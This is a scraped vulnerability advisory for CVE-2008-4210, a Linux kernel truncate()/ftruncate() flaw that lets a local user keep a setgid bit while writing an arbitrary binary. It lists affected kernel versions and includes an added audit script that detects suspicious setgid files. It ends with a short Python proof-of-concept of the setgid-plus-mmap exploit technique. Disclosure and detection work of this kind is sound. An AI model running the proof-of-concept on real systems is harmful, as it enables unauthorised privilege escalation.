Seebug | Root | SSV:4118
Sep 27, 2008 - 12:00 a.m.

Linux Kernel 'truncate()' Local Privilege Escalation Vulnerability


EPSS: 0.0004 (Low), percentile 0.4%

BUGTRAQ ID: 31368
CVE ID: CVE-2008-4210
CNCVE ID: CNCVE-20084210

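Linux is an open-source operating system.
The Linux kernel's 'truncate()' and 'ftruncate()' functions contain a design error that a local attacker can exploit to escalate privileges.
When a file is created, open()/creat() allow the setgid bit to be set through the mode argument; because of the bsdgroups mount option, or because the file is created in a setgid directory, the user may not be a member of the new file's group. The user can then use ftruncate() and memory-mapped I/O to turn the new file into an arbitrary binary and gain the privileges of that group, because these operations do not clear the setgid bit.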
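An added audit example (not part of the original advisory): under the conditions described above, the result on disk is a setgid executable whose owner is not a member of the file's group. The Python script below walks a directory tree and reports such files; the function names, and the choices to skip root-owned files and setgid files without group-execute, are assumptions of this example.

```python
import os
import pwd
import stat
import sys


def groups_for_uid(uid):
    """All gids held by the account (primary and supplementary); empty if unknown."""
    try:
        pw = pwd.getpwuid(uid)
    except KeyError:
        return set()
    return set(os.getgrouplist(pw.pw_name, pw.pw_gid))


def is_suspect(st_mode, st_uid, st_gid, owner_gids):
    """True for a setgid executable whose non-root owner is not in its group."""
    if not stat.S_ISREG(st_mode):
        return False
    # setgid without group-execute marks mandatory locking, not a privilege grant
    if not (st_mode & stat.S_ISGID and st_mode & stat.S_IXGRP):
        return False
    if st_uid == 0:
        return False
    return st_gid not in owner_gids


def scan(root, lookup=groups_for_uid):
    """Return (path, uid, gid, mode) for every suspect file below root."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # file vanished or is unreadable; skip it
            if is_suspect(st.st_mode, st.st_uid, st.st_gid, lookup(st.st_uid)):
                hits.append((path, st.st_uid, st.st_gid,
                             oct(stat.S_IMODE(st.st_mode))))
    return hits


if __name__ == "__main__":
    for hit in scan(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(*hit)
```

A hit is a lead for review rather than proof of compromise, since an administrator can also create such a file deliberately with chown/chgrp.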

Linux kernel 2.6.21 4
Linux kernel 2.6.21 .7
Linux kernel 2.6.21 .6
Linux kernel 2.6.21 .2
Linux kernel 2.6.21 .1
Linux kernel 2.6.21
Linux kernel 2.6.20 .9
Linux kernel 2.6.20 .8
Linux kernel 2.6.20 .5
Linux kernel 2.6.20 .4
Linux kernel 2.6.20 .15
Linux kernel 2.6.20

  • Trustix Secure Enterprise Linux 2.0
  • Trustix Secure Linux 2.2
  • Trustix Secure Linux 2.1
  • Trustix Secure Linux 2.0
    Linux kernel 2.6.20
    Linux kernel 2.6.19 1
    Linux kernel 2.6.19 .2
    Linux kernel 2.6.19 .1
    Linux kernel 2.6.19 -rc4
  • Trustix Secure Enterprise Linux 2.0
  • Trustix Secure Linux 2.2
  • Trustix Secure Linux 2.1
  • Trustix Secure Linux 2.0
    Linux kernel 2.6.19 -rc3
  • Trustix Secure Enterprise Linux 2.0
  • Trustix Secure Linux 2.2
  • Trustix Secure Linux 2.1
  • Trustix Secure Linux 2.0
    Linux kernel 2.6.19 -rc2
  • Trustix Secure Enterprise Linux 2.0
  • Trustix Secure Linux 2.2
  • Trustix Secure Linux 2.1
  • Trustix Secure Linux 2.0
    Linux kernel 2.6.19 -rc1
    Linux kernel 2.6.19
  • Trustix Secure Enterprise Linux 2.0
  • Trustix Secure Linux 2.2
  • Trustix Secure Linux 2.1
  • Trustix Secure Linux 2.0
    Linux kernel 2.6.18 .4
    Linux kernel 2.6.18 .3
    Linux kernel 2.6.18 .1
    Linux kernel 2.6.18
  • Debian Linux 4.0 sparc
  • Debian Linux 4.0 s/390
  • Debian Linux 4.0 powerpc
  • Debian Linux 4.0 mipsel
  • Debian Linux 4.0 mips
  • Debian Linux 4.0 m68k
  • Debian Linux 4.0 ia-64
  • Debian Linux 4.0 ia-32
  • Debian Linux 4.0 hppa
  • Debian Linux 4.0 arm
  • Debian Linux 4.0 amd64
  • Debian Linux 4.0 alpha
  • Debian Linux 4.0
  • Trustix Secure Enterprise Linux 2.0
  • Trustix Secure Linux 2.2
  • Trustix Secure Linux 2.1
  • Trustix Secure Linux 2.0
    Linux kernel 2.6.17 .8
    Linux kernel 2.6.17 .7
    Linux kernel 2.6.17 .6
    Linux kernel 2.6.17 .5
    Linux kernel 2.6.17 .3
    Linux kernel 2.6.17 .2
    Linux kernel 2.6.17 .14
    Linux kernel 2.6.17 .13
    Linux kernel 2.6.17 .12
    Linux kernel 2.6.17 .11
    Linux kernel 2.6.17 .10
    Linux kernel 2.6.17 .1
    Linux kernel 2.6.17 -rc5
    Linux kernel 2.6.17
    Linux kernel 2.6.16 27
    Linux kernel 2.6.16 13
    Linux kernel 2.6.16 .9
    Linux kernel 2.6.16 .7
  • Trustix Secure Enterprise Linux 2.0
  • Trustix Secure Linux 2.2
  • Trustix Secure Linux 2.1
  • Trustix Secure Linux 2.0
    Linux kernel 2.6.16 .23
    Linux kernel 2.6.16 .19
    Linux kernel 2.6.16 .12
    Linux kernel 2.6.16 .11
    Linux kernel 2.6.16 .1
    Linux kernel 2.6.16 -rc1
    Linux kernel 2.6.16
    Linux kernel 2.6.15 .4
    Linux kernel 2.6.15 .3
    Linux kernel 2.6.15 .2
    Linux kernel 2.6.15 .1
    Linux kernel 2.6.15 -rc3
    Linux kernel 2.6.15 -rc2
    Linux kernel 2.6.15 -rc1
    Linux kernel 2.6.15
  • Trustix Secure Enterprise Linux 2.0
  • Trustix Secure Linux 2.2
  • Trustix Secure Linux 2.1
  • Trustix Secure Linux 2.0
    Linux kernel 2.6.14 .5
    Linux kernel 2.6.14 .4
    Linux kernel 2.6.14 .3
    Linux kernel 2.6.14 .2
    Linux kernel 2.6.14 .1
    Linux kernel 2.6.14 -rc4
    Linux kernel 2.6.14 -rc3
    Linux kernel 2.6.14 -rc2
    Linux kernel 2.6.14 -rc1
    Linux kernel 2.6.14
  • Trustix Secure Enterprise Linux 2.0
  • Trustix Secure Linux 2.2
  • Trustix Secure Linux 2.1
  • Trustix Secure Linux 2.0
    Linux kernel 2.6.13 .4
    Linux kernel 2.6.13 .3
    Linux kernel 2.6.13 .2
    Linux kernel 2.6.13 .1
    Linux kernel 2.6.13 -rc7
    Linux kernel 2.6.13 -rc6
    Linux kernel 2.6.13 -rc4
    Linux kernel 2.6.13 -rc1
    Linux kernel 2.6.13
  • Trustix Secure Enterprise Linux 2.0
  • Trustix Secure Linux 2.2
  • Trustix Secure Linux 2.1
  • Trustix Secure Linux 2.0
    Linux kernel 2.6.12 .6
    Linux kernel 2.6.12 .5
    Linux kernel 2.6.12 .4
    Linux kernel 2.6.12 .3
    Linux kernel 2.6.12 .22
    Linux kernel 2.6.12 .2
    Linux kernel 2.6.12 .12
    Linux kernel 2.6.12 .1
    Linux kernel 2.6.12 -rc5
    Linux kernel 2.6.12 -rc4
    Linux kernel 2.6.12 -rc1
    Linux kernel 2.6.12
    Linux kernel 2.6.11 .8
    Linux kernel 2.6.11 .7
    Linux kernel 2.6.11 .6
    Linux kernel 2.6.11 .5
    Linux kernel 2.6.11 .4
    Linux kernel 2.6.11 .12
    Linux kernel 2.6.11 .11
    Linux kernel 2.6.11 -rc4
    Linux kernel 2.6.11 -rc3
    Linux kernel 2.6.11 -rc2
    Linux kernel 2.6.11
    Linux kernel 2.6.10 rc2
    Linux kernel 2.6.10
  • Trustix Secure Enterprise Linux 2.0
  • Trustix Secure Linux 2.2
  • Trustix Secure Linux 2.1
  • Trustix Secure Linux 2.0
    Linux kernel 2.6.2
    Linux kernel 2.6.1 -rc2
    Linux kernel 2.6.1 -rc1
    Linux kernel 2.6.1
    Linux kernel 2.6 .10
    Linux kernel 2.6 -test9-CVS
    Linux kernel 2.6 -test9
    Linux kernel 2.6 -test8
    Linux kernel 2.6 -test7
    Linux kernel 2.6 -test6
    Linux kernel 2.6 -test5
    Linux kernel 2.6 -test4
    Linux kernel 2.6 -test3
    Linux kernel 2.6 -test2
    Linux kernel 2.6 -test11
    Linux kernel 2.6 -test10
    Linux kernel 2.6 -test1
    Linux kernel 2.6
    Linux kernel 2.6.21-RC6
    Linux kernel 2.6.21-RC5
    Linux kernel 2.6.21-RC4
    Linux kernel 2.6.21-RC3
    Linux kernel 2.6.20.3
    Linux kernel 2.6.20.2
    Linux kernel 2.6.20.13
    Linux kernel 2.6.20.11
    Linux kernel 2.6.20.1
    Linux kernel 2.6.20-rc2
    Linux kernel 2.6.20-2
    Linux kernel 2.6.18-8.1.8.el5
    Linux kernel 2.6.18-53
    Linux kernel 2.6.18
    Linux kernel 2.6.15.5
    Linux kernel 2.6.15.11
    Linux kernel 2.6.15-27.48
    Linux kernel 2.6.11.4

Upgrade to the latest Linux kernel:
http://www.linux.org/


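#!/usr/bin/env python3
import mmap
import os

# Bytes to place in the new file (here, a copy of /usr/bin/id).
with open("/usr/bin/id", "rb") as src:
    data = src.read()
# Create the file with the setgid bit set (mode 02750).
fd = os.open("id", os.O_RDWR | os.O_CREAT | os.O_EXCL, 0o2750)
# Size it with ftruncate() and fill it through a memory mapping; on affected
# kernels neither operation clears the setgid bit.
os.ftruncate(fd, len(data))
m = mmap.mmap(fd, len(data))
m[:] = data
m.flush()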